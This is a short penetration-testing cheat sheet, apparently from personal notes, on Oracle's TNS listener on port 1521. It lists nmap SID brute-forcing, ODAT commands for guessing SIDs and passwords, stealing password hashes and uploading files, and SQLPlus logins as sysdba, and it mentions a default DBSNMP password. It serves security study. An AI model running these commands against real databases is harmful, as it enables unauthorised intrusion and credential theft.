TNS ¶

Transparent Network Substrate (TNS) is a protocol owned and developed by Oracle. It's mainly used to manage Oracle Databases.

It includes performance monitoring and analysis, error reporting, and logging tools. It supports a wide range of networking protocols such as IPX/SPX, TCP/IP, IPV6, and SSL/TLS. Communications are encrypted.

🐊️ Port: 1521 (TCP)

The server-side service that listens for clients is called a listener. Its configuration determines which networking protocols are allowed.

List databases using brute force:

$ sudo nmap IP -p 1521 -sV --script oracle-sid-brute

Oracle Database Attacking Tool (ODAT, 1.5k ⭐, 2022 ☠️) can be used to enumerate or exploit Oracle Databases.

$ sudo apt install odat
$ odat all -s IP
$ odat sidguesser -s IP
$ odat passwordguesser -s IP -d sid
$ odat passwordstealer -s IP -U username -P password -d sid --sysdba --get-passwords
$ odat utlfile [...] # file upload

📚 User may have sys dba access, try --sysdba.

We can use Oracle SQLPlus to connect to the database:

$ sudo apt-get install oracle-instantclient-sqlplus
$ sudo updatedb
$ # if you got an error when running sqlplus
$ lpath=$(dirname `locate libsqlplus.so`) ; echo $lpath
$ sudo sh -c "echo $lpath > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
$ # connect
$ sqlplus username/password@IP/sid
$ sqlplus username/password@IP/sid as sysdba

📚 User may have sys dba access, try as sysdba.

• tnsnames.ora (client-side infos, list of db/services configurations)
• listener.ora (server-side config, listener config)
• $ORACLE_HOME/network/admin folder
• DBSNMP service has dbsnmp default password
• Finger service?
• PL/SQL Exclusion List (PlsqlExclusionList)
• Remove Listener Management?